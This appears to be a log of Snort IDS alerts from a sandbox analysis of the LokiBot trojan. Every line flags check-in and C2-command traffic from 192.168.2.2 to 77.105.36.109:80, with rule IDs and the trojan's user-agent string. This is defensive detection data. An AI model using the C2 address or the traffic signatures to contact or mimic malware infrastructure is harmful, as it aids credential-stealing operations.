            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49194 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49194 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49195 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49195 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49195 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49195 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49196 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49196 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49196 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49196 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49197 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49197 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49197 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49197 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49198 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49198 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49198 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49198 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49199 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49199 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49199 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49199 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49200 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49200 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49200 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49200 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49201 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49201 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49201 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49201 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49202 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49202 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49202 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49202 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49203 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49203 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49203 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49203 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49204 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49204 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49204 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49204 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49205 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49205 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49205 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49205 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49206 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49206 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49206 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49206 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49208 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49208 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49208 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49208 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49209 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49209 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49209 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49209 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49210 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49210 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49210 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49210 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49211 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49211 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49211 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49211 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49212 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49212 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49212 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49212 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49213 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49213 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49213 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49213 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49215 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49215 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49215 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49215 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49216 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49216 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49216 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49216 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49217 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49217 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49217 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49217 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49218 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49218 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49218 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49218 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49219 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49219 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49219 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49219 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49220 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49220 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49220 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49220 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49221 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49221 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49221 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49221 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49222 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49222 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49222 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49222 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49223 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49223 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49223 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49223 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49224 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49224 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49224 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49224 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49225 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49225 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49225 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49225 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49226 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49226 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49226 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49226 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49227 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49227 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49227 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49227 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49228 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49228 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49228 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49228 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49229 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49229 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49229 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49229 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49230 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49230 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49230 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49230 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49231 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49231 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49231 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49231 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49232 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49232 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49232 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49232 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49233 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49233 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49233 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49233 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49234 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49234 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49234 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49234 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49235 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49235 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49235 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49235 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49236 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49236 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49236 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49236 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49237 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49237 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49237 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49237 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49238 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49238 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49238 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49238 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49239 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49239 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49239 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49239 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49240 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49240 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49240 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49240 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49241 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49241 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49241 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49241 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49242 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49242 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49242 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49242 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49243 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49243 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49243 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49243 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49244 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49244 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49244 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49244 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49245 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49245 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49245 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49245 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49246 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49246 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49246 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49246 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49247 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49247 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49247 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49247 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49248 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49248 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49248 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49248 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49249 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49249 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49249 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49249 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49250 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49250 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49250 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49250 -> 77.105.36.109:80
